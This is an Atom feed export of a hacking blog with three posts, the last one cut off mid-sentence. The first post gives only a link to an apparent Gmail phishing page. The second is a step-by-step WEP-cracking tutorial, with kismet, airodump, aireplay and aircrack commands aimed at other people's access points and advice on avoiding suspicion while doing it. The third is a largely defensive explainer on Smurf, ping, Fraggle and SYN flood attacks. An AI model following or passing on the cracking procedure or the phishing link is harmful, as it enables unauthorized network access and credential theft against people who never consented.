<?xml version='1.0' encoding='UTF-8'?><?xml-stylesheet href="http://www.blogger.com/styles/atom.css" type="text/css"?><feed xmlns='http://www.w3.org/2005/Atom' xmlns:openSearch='http://a9.com/-/spec/opensearchrss/1.0/' xmlns:georss='http://www.georss.org/georss' xmlns:gd='http://schemas.google.com/g/2005' xmlns:thr='http://purl.org/syndication/thread/1.0'><id>tag:blogger.com,1999:blog-2751220495572944536</id><updated>2012-02-16T13:10:45.078-08:00</updated><title type='text'>Hacking Mafia</title><subtitle type='html'></subtitle><link rel='http://schemas.google.com/g/2005#feed' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/posts/default'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default?max-results=100'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/'/><link rel='hub' href='http://pubsubhubbub.appspot.com/'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><generator version='7.00' uri='http://www.blogger.com'>Blogger</generator><openSearch:totalResults>80</openSearch:totalResults><openSearch:startIndex>1</openSearch:startIndex><openSearch:itemsPerPage>100</openSearch:itemsPerPage><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-1209887040709382865</id><published>2011-01-13T06:14:00.001-08:00</published><updated>2011-01-13T06:15:26.719-08:00</updated><title type='text'>Gmail Phishing interesting</title><content type='html'>gsecurety.t35.com/gmail.html&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;I TAKE NO RESPONSIBILITY WHAT you DO WITH THE INFORMATION PROVIDED IN THIS POST.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-1209887040709382865?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/1209887040709382865/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=1209887040709382865' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1209887040709382865'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/1209887040709382865'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2011/01/gmail-phishing-interesting.html' title='Gmail Phishing interesting'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-849881232808336970</id><published>2009-01-16T10:44:00.000-08:00</published><updated>2009-01-16T10:45:50.442-08:00</updated><title type='text'>Crack WEP Tutorial WEP cracking [In 10mins]</title><content type='html'>More Cracking WEP GUIDES and Information From&lt;br /&gt;Intro:&lt;br /&gt;Ok, this is a tutorial explaining how to crack most WEP encrypted Access Points out there. The tools used will be as follows:&lt;br /&gt;Kismet (any working version)&lt;br /&gt;&gt;= Aireplay 2.2 beta&lt;br /&gt;&gt;= Aircrack 2.1&lt;br /&gt;As for wireless cards, i recommend any Prism , Orinoco , or Atheros based cards (i used the D-Link 650 Rev.1a).&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;Getting Started:&lt;br /&gt;Let's see, First thing you are going to want to do is charge your lappy to the top (aireplay and aircrack drain the battery quite a bit) Next you are going to want to load up your favourite live CD (i used Whoppix 2.7 final) or Linux OS, then stumble across a encrypted WLAN, use Kismet to do so. Make sure you have configured your kismet .conf file correctly to be able to use your card (locate your kismet.conf file and open with your favourite text editor, i used pico);&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;&lt;br /&gt;# Sources are defined as:&lt;br /&gt;# source=sourcetype,interface,name[,initialchannel]&lt;br /&gt;# Source types and required drivers are listed in the README&lt;br /&gt;# The initial channel is optional, if hopping is not enabled it can be used&lt;br /&gt;# to set the channel the interface listens on.&lt;br /&gt;# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE&lt;br /&gt;source=orinoco,eth1,kismet&lt;br /&gt;#source=wlanng,wlan0,Prism&lt;br /&gt;#source=kismet_drone,192.168.2.252:3501,kismet_drone&lt;br /&gt;&lt;br /&gt;^^ that is an example of part of my kismet.conf, initially that was wrong for me, i had to comment out the first line and uncomment the second (my wireless device name was wlan0, you can find this out by typing 'iwconfig' in a terminal).&lt;br /&gt;Note: To find your cards chipset have a good google on the model number of your card or try checking here http://www.linux-wlan.org/docs/wlan_adapters.html.gz . A full list of supported chipsets can&lt;br /&gt;be found on the Kismet website under Documentation.&lt;br /&gt;Changed kismet.conf:&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;&lt;br /&gt;# Sources are defined as:&lt;br /&gt;# source=sourcetype,interface,name[,initialchannel]&lt;br /&gt;# Source types and required drivers are listed in the README&lt;br /&gt;# The initial channel is optional, if hopping is not enabled it can be used&lt;br /&gt;# to set the channel the interface listens on.&lt;br /&gt;# YOU MUST CHANGE THIS TO BE THE SOURCE YOU WANT TO USE&lt;br /&gt;#source=orinoco,eth1,kismet&lt;br /&gt;source=wlanng,wlan0,Prism&lt;br /&gt;#source=kismet_drone,192.168.2.252:3501,kismet_drone&lt;br /&gt;&lt;br /&gt;Save the changes you make and go back to a terminal and run 'kismet', it should load up if you configd it properly. Once you have got kismet going, have a good stumble around your area, to see if a WLAN has WEP enabled, kismet should have a column near the ESSID titled with 'W' if it has WEP enabled it will have a Y, if not it will be a N.&lt;br /&gt;Going in for the kill:&lt;br /&gt;So now you got a target you are going to make sure you dont look suspicious and you got at least 15mins worth of battery life left Razz. Making sure you know the channel the Access Point is on (under the CH cloumn in kismet) and also the mac address of the Access Point by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected.&lt;br /&gt;First off you are going to want to set your wireless card to the right mode, depending on what chipset depends on what commands you have got to use:&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;&lt;br /&gt;If you use madwifi, you may have to place the card in&lt;br /&gt;pure 802.11b mode first:&lt;br /&gt;iwpriv ath0 mode 2&lt;br /&gt;If you use wlan-ng, run&lt;br /&gt;./wlanng.sh start wlan0 &lt;channel&gt; [comes with  AirePlay2.2]&lt;br /&gt;Otherwise run:&lt;br /&gt;iwconfig ath0 mode Monitor channel &lt;channel&gt;&lt;br /&gt;ifconfig ath0 up&lt;br /&gt;&lt;br /&gt;Read the AirePlay2.2 readme for more info.&lt;br /&gt;Start by opening up another terminal window and cd into your aircrack directory and launch airodump:&lt;br /&gt;Code:&lt;br /&gt;#./airodump&lt;br /&gt;[version crap]&lt;br /&gt;usage: ./airodump &lt;wifi interface&gt; &lt;output filename&gt; [mac filter]&lt;br /&gt;e.g&lt;br /&gt;./airodump wlan0 linksys&lt;br /&gt;The mac filter is used when you have more than one Access point on the same channel at once, so say you have 'jim_home' and 'linksys' both essid's of access points both on channel 11 you would grab the mac address of of the Access Point in kismet, by hiting 's' (to sort) then scrolling to the desired Access Point and then typing 'i' which gives you detailed info on the Access Point selected. Ok so now you have got a stream of packets from your target, you see the IV column, those are whats known as 'weak key' packets, we want as many of them as we can get (400k+ is a nice number Razz). Now we are going to capture a 'weak key' packet from on the network we are targeting and going to flood the Access Point with it in hope that we get lots of 'weak key' replies sent out so we can eventually crack the password. So now in your other terminal window 'cd' into your aireplay directory and execute aireplay ('./aireplay'[return]):&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;&lt;br /&gt;capture packets unless interface #1 is specified.&lt;br /&gt;source options:&lt;br /&gt;-i        : capture packet on-the-fly (default)&lt;br /&gt;-r file   : extract packet from this pcap file&lt;br /&gt;filter options:&lt;br /&gt;-b bssid  : MAC address, Access Point&lt;br /&gt;-d dmac   : MAC address, Destination&lt;br /&gt;-s smac   : MAC address, Source&lt;br /&gt;-m len    : minimum packet length, default:  40&lt;br /&gt;-n len    : maximum packet length, default: 512&lt;br /&gt;-u type   : fc, type     - default: 2 = data&lt;br /&gt;-v subt   : fc, subtype  - default: 0 = normal&lt;br /&gt;-t tods   : fc, To   DS bit - default: any&lt;br /&gt;-f fromds : fc, From DS bit - default: any&lt;br /&gt;-w iswep  : fc, WEP     bit - default: 1&lt;br /&gt;-y        : don't ask questions, assume yes&lt;br /&gt;replay options:&lt;br /&gt;-x nbpps  : number of packets per second&lt;br /&gt;-a bssid  : set Access Point MAC address&lt;br /&gt;-c dmac   : set Destination  MAC address&lt;br /&gt;-h smac   : set Source       MAC address&lt;br /&gt;-o fc0    : set frame control[0] (hex)&lt;br /&gt;-p fc1    : set frame control[1] (hex)&lt;br /&gt;-k        : turn chopchop attack on&lt;br /&gt;&lt;br /&gt;e.g&lt;br /&gt;./aireplay -b 00:FF:00:FF:00:FF -x 512 wlan0&lt;br /&gt;Here we are going to grab a few packets from the Access Point with the MAC address 00:FF:00:FF:00:FF until we catch a 'weak key' packet which then aireplay will ask you if you want to use to then flood the Access Point with that packet. when it asks you if it can use one of the packets hit 'y' then return. If you flick back to your terminal with airodump running you should see the packets being captured will increase by a huge amount and with that the IV packets should also be increasing pretty damn fast aswell, if all went well in about 10mins you should have enough packets to then dump into aircrack. Ok so you want at least 400k+ IV packets (the more the better), once you got a decent amount hit 'control+c' in both terminal windows to terminate both aireplay and airodump, now 'cd' into your aircrack directory and run aircrack ('./aircrack'[return]):&lt;br /&gt;&lt;br /&gt;CODE&lt;br /&gt;&lt;br /&gt;aircrack 2.1 - (C) 2004 Christophe Devine&lt;br /&gt;usage: ./aircrack [options] &lt;pcap file&gt; &lt;pcap file&gt; ...&lt;br /&gt;-d &lt;start&gt; : debug - specify beginning of the key&lt;br /&gt;-f &lt;fudge&gt; : bruteforce fudge factor (default: 2)&lt;br /&gt;-m &lt;maddr&gt; : MAC address to filter usable packets&lt;br /&gt;-n &lt;nbits&gt; : WEP key length: 64 / 128 / 256 / 512&lt;br /&gt;-p &lt;nfork&gt; : SMP support: # of processes to start&lt;br /&gt;-q &lt;quiet&gt; : Quiet mode (less print more speed)&lt;br /&gt;&lt;br /&gt;e.g&lt;br /&gt;./aircrack -n 128 linksys.cap&lt;br /&gt;what i did there was set aircrack to read my packet file called linksys.cap (what airodump creates) and telling aircrack it was a 128 bit encryption. If all goes well you will get the key in nice red text.&lt;br /&gt;KEY FOUND: [ Pwn3d ]&lt;br /&gt;Happy WarDriving.&lt;br /&gt;(Please reply with any errors in my tutorial&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/2751220495572944536-849881232808336970?l=hackmafia.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://hackmafia.blogspot.com/feeds/849881232808336970/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=2751220495572944536&amp;postID=849881232808336970' title='1 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/849881232808336970'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/2751220495572944536/posts/default/849881232808336970'/><link rel='alternate' type='text/html' href='http://hackmafia.blogspot.com/2009/01/crack-wep-tutorial-wep-cracking-in.html' title='Crack WEP Tutorial WEP cracking [In 10mins]'/><author><name>pypiyu</name><uri>http://www.blogger.com/profile/08273458348956575683</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><thr:total>1</thr:total></entry><entry><id>tag:blogger.com,1999:blog-2751220495572944536.post-2266268974510514883</id><published>2008-12-17T10:23:00.000-08:00</published><updated>2008-12-17T10:24:42.675-08:00</updated><title type='text'>Denial-Of-Services Attack - Detailed Explanation</title><content type='html'>&lt;span style="font-size:85%;"&gt;Demystifying &lt;b&gt;Denial-Of-Service attacks&lt;/b&gt;, part one By &lt;b&gt;Admin @ Techmaifas.&lt;/b&gt; This paper provides an introduction to Denial of Service (DoS) attacks, their methodologies, common prevention techniques, and how they differ from Distributed Denial of Service (DDoS) Attacks. This article is intended to be a broad overview for the beginner or intermediate-level administrator on the different types of DoS attacks.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;1. Definitions&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;We begin by defining Denial of Service and Distributed Denial of Service.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;1.1 What is a DoS?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;As the name implies, DoS is a Denial of Service to a victim trying to access a resource. In many cases it can be safey said that the attack requires a protocol flaw as well as some kind of network amplification.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Denial of Services is also an attack on a computer system or network that causes a loss of service to users, typically the loss of network connectivity and services through the the consumption of bandwidth of the victim network, or the overloading the computational resources of the victim system. (see the Wikipedia definition)&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;The motivation for DoS attacks is not to break into a system. Instead, it is to deny the legitimate use of the system or network to others who need its services. One can say that this will typically happen through one of the following means:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;1.&lt;/b&gt; Crashing the system.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;2.&lt;/b&gt; Deny communication between systems.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;3.&lt;/b&gt; Bring the network or the system down or have it operate at a reduced speed which affects productivity.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;4.&lt;/b&gt; Hang the system, which is more dangerous than crashing since there is no automatic reboot. Productivity can be disrupted indefinitely.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;DoS attacks can also be major components of other type of attacks.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;1.2 What is a Distributed DoS?&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;A Distributed DoS (DDoS) is the combined effort of several machines to bring down victim. In many cases there is a master machine that launches the attack to zombie machines that are part of a bot network, as shown below in Figure 1. Some bot networks contain many thousands of machines used to launch an attack.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;img src="http://www.techmafias.com/forum/extras/posts/ddos1.gif" alt="" border="0" /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;With DoS and DDos defined, we'll now take a look at attacks that affect the consumption of resources, such as Smurf attacks, and then address attacks like SYN Flood that affect network connectivity.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Note that the consumption of resources is most evident when it involves the exploitation of bandwidth, CPU usage, memory, disk space, or access to other computers and resources.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;2. Bandwidth exhaustion attacks&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;A bandwidth exhaustion attack is where an attacker tries to consume the available bandwidth of a network by sending a flood of packets. This is most often accomplished with the help of several other machines. There is soon a flood of malicious nonsense packets on the network in large quantity, whereby the chances of survival of any good, legitimate packets becomes remote. Eventually the network becomes choked with these packets, and the network is effectively cutoff from the Internet and services are denied.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;An ideal example of a bandwidth exhaustion attack would be Smurf attacks. Consider a scenario with an ISP and three clients, as shown below in Figure 2. In this scenario, the ISP receives extensive traffic for client 2 on its backbone. Since the connection to client 2 is of limited capacity and smaller than the ISP's backbone, it can't push all the data received for client 2 through the link to client 2. Therefore it will start to drop packets, and the TCP connections will lead to retransmissions of the lost/dropped packets. There will be a time when a legitimate host wants to connect to Client 2's network, but this will timeout and hence a DoS will occur.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;img src="http://www.techmafias.com/forum/extras/posts/ddos2.gif" alt="" border="0" /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;2.1 Smurf Attack&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Named after a popular program which generates this attack, an ICMP echo request is sent to a broadcast network address (acting as an amplifying agent) with the source address of the victim spoofed. This results in a storm of replies from that network which, if large enough, has the power to take the victim's network down. It is to be noted that there is not much a victim can do about this attack since the link is simply overloaded with packets.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;There are always three parts of a Smurf Attack:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;1.&lt;/b&gt; Attacker&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;2.&lt;/b&gt; Amplifier - a router&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;3.&lt;/b&gt; Victim&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;This attack succeeds because the amplifier is misconfugred to forward the directed broadcasts.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Suppose the address range 172.30.164.0 to 172.30.164.255 is assigned to a company which has an amplifier, and an attacker sends packets with destination 172.20.164.255. All the routers and systems from attacker to the amplifier will not see the difference between this IP and 172.30.164.10 (an IP from the range). The packet reaches the amplifier and the amplifier notices that this is the broadcast address, so it forwards the request to all the systems on the network/subnet. This is known as directed broadcast.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;The two crucial components of this attack were:&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;1.&lt;/b&gt; A misconfigured router forwarding the broadcast request to the subnet.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;2.&lt;/b&gt; Machines that will respond to this ICMP broadcast request.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Going deeper we can see that the amplifier also makes itself and its network a victim of this attack.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Victims are typically chosen by attackers from IRC where bots (automated programs) are kept to look for the address of victims. Hackers often exchange the information about amplifiers with each other so when a mass attack takes palce it usually appears to come from all over the globe.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Powertech provides realtime statistics of the top amplifiers currently on the Internet.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Below is a typical depiction of the dumps at the Victim. These are ICMP Echo replies received at the Victim's end. Then Figure 3 provides an overview of a Smurf attack.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;  &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 162px; text-align: left;"&gt;&lt;span style="font-size:85%;"&gt;10:10:17.100000 172.30.164.1   &gt; victim:  icmp: echo reply&lt;/span&gt; &lt;span style="font-size:85%;"&gt;10:10:18.300000 172.30.164.76 &gt; victim:  icmp: echo reply&lt;/span&gt; &lt;span style="font-size:85%;"&gt;10:10:18.310000 172.30.164.10 &gt; victim:  icmp: echo reply&lt;/span&gt; &lt;span style="font-size:85%;"&gt;10:10:19.110000 172.30.164.223 &gt; victim:  icmp: echo reply&lt;/span&gt; &lt;span style="font-size:85%;"&gt;10:11:09.190000 172.30.164.51 &gt; victim:  icmp: echo reply&lt;/span&gt; &lt;span style="font-size:85%;"&gt;10:11:09.240000 172.30.164.18 &gt; victim:  icmp: echo reply&lt;/span&gt; &lt;span style="font-size:85%;"&gt;10:11:10.110000 172.30.164.98 &gt; victim:  icmp: echo reply&lt;/span&gt; &lt;span style="font-size:85%;"&gt;10:11:10.600000 172.30.164.18 &gt; victim:  icmp: echo reply&lt;/span&gt; &lt;span style="font-size:85%;"&gt;10:11:10.790000 172.30.164.240 &gt; victim:  icmp: echo reply&lt;/span&gt;&lt;/pre&gt; &lt;/div&gt;&lt;span style="font-size:85%;"&gt;&lt;img src="http://www.techmafias.com/forum/extras/posts/ddos3.gif" alt="" border="0" /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;2.2 How to protect against Smurf attacks&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;Step 1. &lt;/b&gt;Amplifier Configuration. The router should be configured so that it does not forward directed broadcasts onto networks. It is important to note that the broadcast has to be disabled on all the routers and not merely just the external ones. Command "no ip directed-broadcast" on Cisco routers should do the job in most cases. This will also ensure that employees on the internal network won't be able to launch Smurf attacks. However it is also advisable that one has a filtering device (such as a firewall) on the perimeter, thereby providing an extra layer of security.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;Step 2.&lt;/b&gt; Configure the server operating systems. Servers should be configured so that they will not respond to a directed broadcast request. FreeBSD is one such system which by default does not respond to this request. Other systems can be similarly configured, and this will be discussed in the next section.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;Step 3.&lt;/b&gt; Victim issues. As mentioned earlier, not much can be done at the victim's end and damage will be done unless victim's ISP takes some actions to block these ICMP Echo Reply floods. Even if the victim's parameter router denies the ICMP Echo Reply, the link from the ISP to the victim's site will suffer.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;2.3 ICMP Ping Flood attacks&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Ping Floods are where an attacker floods the victim's network with large number of ICMP Echo Requests - such as by flooding the network as fast as possible. In this scenario, filtering the incoming packets might help, however, if the victim is on a modem instead of a high-speed connection, nothing can be done. However the catch in this attack is that if not done properly the attacker can also be counter-attacked, so he needs to be on a faster network than the victim. In most cases, mitigating this attack involves isolating spoofed IPs. This attack is easy to peform since there are many tools on Internet and little knowledge is required to execute a ping flood.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;2.4 Fraggle attacks&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;A Fraggle attack is a Smurf variant that uses UDP instead of ICMP. In this case, the ports echo, chargen, daytime, qotd are used to trigger responses. These ports are also susceptible to a pingpong attack, and therefore these serves should be turned off or blocked.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;3. Network connectivity attacks&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;These attacks overload the victim so that its TCP/IP stack is not able to handle any further conections, and processing queues are completely full with nonsense malicious packets. As a consequence of this attack, legitimate connections are denied. One classic example of a network connectivity attack is a SYN Flood.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;3.1 Example: SYN Flood attacks&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;A SYN Flood is where an attacker sends packets with a spoofed source IP Address and a TCP SYN Flag set to the server (victim). Let's first assume that the attacker knows which ports are open on the server. Since the source IP is spoofed, the response sent to the SYN packet by the server will never receive a reply back. The server will keep waiting until it times out. If this happens for a very large number of connections the result will be a DoS, since the server won't be available for any legitimate connections and its resources will be choked.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;As will be shown, this attack exploits a vulnerability of the TCP protocol, by the way in which the TCP three-way connection is established. This is shown below in Figure 4.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;img src="http://www.techmafias.com/forum/extras/posts/ddos4.gif" alt="" border="0" /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;3.2 Protecting against SYN Flood attacks&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;There are several things that can be done to protect against SYN Flood attacks.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;1.&lt;/b&gt; Decrease the TCP Connection Timeout on the victim server.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;2.&lt;/b&gt; Use a filtering device, like a firewall, at the perimeter which works as an intermediary in forwarding the connections to the server.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Use of a server farm: this can also help in fighting the SYN Flood since you will have number of the servers to answer the request, but this also has limitations and overhead considerations.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;A detailed article on SYN Flood protection by Mariusz Burdach was previously published on SecurityFocus. Therefore, only a short overview of SYN Flood protection will be discussed in this section.&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;3.2.1 Protecting Microsoft Windows from a SYN Flood attack&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Microsoft Windows has a mechanism to detect and start SYN Flood protection. The SYN flooding attack protection feature detects symptoms of SYN flooding and responds by reducing the time the server spends on connection requests that it cannot acknowledge.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Specifically, TCP shortens the required interval between SYN-ACK (connection request acknowledgements) retransmissions. TCP retransmits SYN-ACKS when they are not answered. As a result, the allotted number of retransmissions is consumed more quickly and the unacknowledgeable connection request is discarded faster.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;When enabled, the system monitors the connections maintained by TCP and starts the SYN attack flooding protection when the any of the following conditions, symptomatic of SYN flooding, are found:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;* The total number of connections in the half-open (SYN-RCVD) state exceeds the value of TcpMaxHalfOpen&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;* The number of connections that remain in the half-open (SYN-RCVD) state even after a connection request has been retransmitted exceeds the value of TcpMaxHalfOpenRetried&lt;/span&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;* The number of connection requests the system refuses exceeds the value of TcpMaxPortsExhausted. The system must refuse all connection requests when its reserve of open connection ports runs out.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;Microsoft suggests the following registry settings:&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;div style="margin: 5px 20px 20px;"&gt;  &lt;div class="smallfont" style="margin-bottom: 2px;"&gt;Code:&lt;/div&gt;  &lt;pre class="alt2" dir="ltr" style="border: 1px inset ; margin: 0px; padding: 6px; overflow: auto; width: 640px; height: 146px; text-align: left;"&gt;&lt;span style="font-size:85%;"&gt;hkey_local_machine \system \currentcontrolset \services &lt;/span&gt; &lt;span style="font-size:85%;"&gt;\tcpip \parameters \synattackprotect=1 REG_DWORD&lt;/span&gt;   &lt;span style="font-size:85%;"&gt;hkey_local_machine \system \currentcontrolset \services \tcpip &lt;/span&gt; &lt;span style="font-size:85%;"&gt;\parameters \tcpmaxconnectresponseretransmissions=2 REG_DWORD&lt;/span&gt;   &lt;span style="font-size:85%;"&gt;hkey_local_machine \system \currentcontrolset \services \tcpip &lt;/span&gt; &lt;span style="font-size:85%;"&gt;\parameters \tcpmaxdataretransmissions=3 REG_DWORD&lt;/span&gt;&lt;/pre&gt; &lt;/div&gt;&lt;span style="font-size:85%;"&gt;&lt;b&gt;3.2.2 Check Point protections against a SYN Flood attack&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;In the first scenario, we look at Check Point as a simple proxy to the victim server. This is shown below in Figure 5.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;img src="http://www.techmafias.com/forum/extras/posts/ddos5.gif" alt="" border="0" /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;In this scenario Check Point acts a proxy to the server and responds to all the requests sent to the server. A request is forwarded to the server only if there is a corresponding ACK. The drawback of this configuration is that normally a perimeter firewall is very heavily loaded and this configuration will induce further load on it. The advantage is that the server will always be free to only take legitimate connections.&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:85%;"&gt;In the second scenario, we look at Check Point preventing a SYN Flood attack while residing in a transparent proxy configuration. This is shown below in 